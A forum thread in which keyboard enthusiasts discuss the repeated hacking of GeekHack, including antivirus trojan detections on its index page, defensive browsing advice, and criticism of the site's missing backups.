deskthority

Sifo wrote:Guess I'll chill here. I asked r00tw0rm what they want with GH, didn't get a straight up response.

I'll bet they're after the domain name, it would be quite fitting for a hacking organization after all.

Sifo wrote:I'm being sent trojans from index. Even just typing in the URL to my browser O_O

If it's Trojan:JS/Alescurf.C a.k.a. Trojan.JS.WPress.A (BitDefender) a.k.a. Troj/JSRedir-EQ (Sophos) then it's what I described above.

And oh the humanity...These god damn script kiddies who actually post videos on some search'n'replace Perl crap they'd written. Nice traces left by using a localized Linux. http://www.youtube.com/watch?v=xCf54VeHipc

Just like those assholes who fucked up one of my other favorite sites, scenemusic.net. But luckily those guys rewrote the whole thing.

AND THEN THEY CALL THIS PIECE OF JUNK 'DEFACER'! OH GOD!

TexasFlood wrote:

Sifo wrote:I'm being sent trojans from index. Even just typing in the URL to my browser O_O

If it's Trojan:JS/Alescurf.C a.k.a. Trojan.JS.WPress.A (BitDefender) a.k.a. Troj/JSRedir-EQ (Sophos) then it's what I described above.

JS/TrojanDownloader.Psyme.NCW trojan

Sifo wrote:

TexasFlood wrote:

Sifo wrote:I'm being sent trojans from index. Even just typing in the URL to my browser O_O

If it's Trojan:JS/Alescurf.C a.k.a. Trojan.JS.WPress.A (BitDefender) a.k.a. Troj/JSRedir-EQ (Sophos) then it's what I described above.

JS/TrojanDownloader.Psyme.NCW trojan

Really? Wow, looked that up, discovered in 2004!

TexasFlood wrote: Really? Wow, looked that up, discovered in 2004!

Anything important about it? I couldn't find anything.

rknize wrote:German and Belgium beer yum. If I brew I'll gain 100 lbs, lol.

Haha! Funny you say that, because I have lost 20lbs since restarting the brewery. Must be all that Vitamin B! ;-)

Why is the site even up at this point?

Ouch, that's pretty nasty.

Are our passwords safe on that site?

dirge wrote:Ouch, that's pretty nasty.

Are our passwords safe on that site?

guess not, better start changing if you use it on other sites

I've had a quick look through the JavaScript and from what I can see it only really tried to do anything on Windows.

Just guessing here but I would have thought that they would run detection scripts against the connecting browser to identify it and the OS, and if they have an exploit for that, match then run it.

If you're a windows user, take Ripster's advice and turn off JavaScript, make sure your browser it up to date (potentially removes exploits they could be using) and make sure you have a good, up-to-date anti-virus.

If you're a Firefox user I recommend using the NoScript add-on, it basically blocks all JavaScript unless you allow it.

At least they aren't giving me another infraction for saying fuck (yet).

I still think it's unacceptable that they'd gotten hacked for how many times and didn't manage to do much about it. "Lost almost all attachments". Umm, where are the filesystem level backups etc. GeekHack is a source of information for many and it's completely irresponsible to NOT have backups for this kind of valuable community generated information!

Damn. Wanted to look up something about switches earlier...

I hate to see GH struggle like this there was a TON of GREAT content.
Sure, there was a log of noise to dig it out from but still...

Icarium wrote:Damn. Wanted to look up something about switches earlier...

I hate to see GH struggle like this there was a TON of GREAT content.
Sure, there was a log of noise to dig it out from but still...

Just look into the wiki!

Maybe it's time for name change? ;D

How many times it has been down this year?

Ekaros wrote:Maybe it's time for name change? ;D

How many times it has been down this year?

geekhacked.org ?

It's almost a certainty that the database will need to be restored from an earlier backup. Every new post that goes up there right now will eventually get blown away when this happens. Also, if the main page is really attempting to infect visitors computers why is the site being kept up? Take it offline and assess the situation.

metafour wrote:It's almost a certainty that the database will need to be restored from an earlier backup. Every new post that goes up there right now will eventually get blown away when this happens. Also, if the main page is really attempting to infect visitors computers why is the site being kept up? Take it offline and assess the situation.

Can't see it is up anymore:

What are you trying to say or show? If that's what you get when you visit the site's main page then clearly the site is still up.

You can still get to the geekhack forums if you use URLs that aren't the main site index page.

I.e. http://geekhack.org/showthread.php?3296 ... -Redirects

Really sad, I don't think that GH should simply give up against these retarded wana be hackers... I mean really, what does a name matter?

Just annoying becuse it can totaly ruin some of the group buys running

All attachments lost? So there hasn't EVER been a backup?

7bit wrote:

metafour wrote:It's almost a certainty that the database will need to be restored from an earlier backup. Every new post that goes up there right now will eventually get blown away when this happens. Also, if the main page is really attempting to infect visitors computers why is the site being kept up? Take it offline and assess the situation.

Can't see it is up anymore:

everytime I go up AVG goes mad and there is txt scrolling accross the page...

The problem is that it has happened a number of times now. If more secure software is not going to be used then I think moving to a different domain needs to be tested to see if the intrusions cease.

Seriously though, as soon as the admin of an exploited site is aware of the exploit the server should be taken offline. It's your responsibility as a sys admin to protect other users of the Internet. This also makes forensics and analysis easier.

When you have an infected computer on a private network the first thing you do is remove it from the network. The same principle applies here. The site should not be up and accessible to the public.

yeah especially if its trying to infect people

metafour wrote:The problem is that it has happened a number of times now. If more secure software is not going to be used then I think moving to a different domain needs to be tested to see if the intrusions cease.
...

The domain name will not change much!

Solution for GeekHack:
- moving to a new software
- moving to a new backup system
- moving to deskthority.org

I take the 3rd solution.

before switching software and backup, they really should work out how they where hacked and what could prevent it...

3rd solution would be a disaster...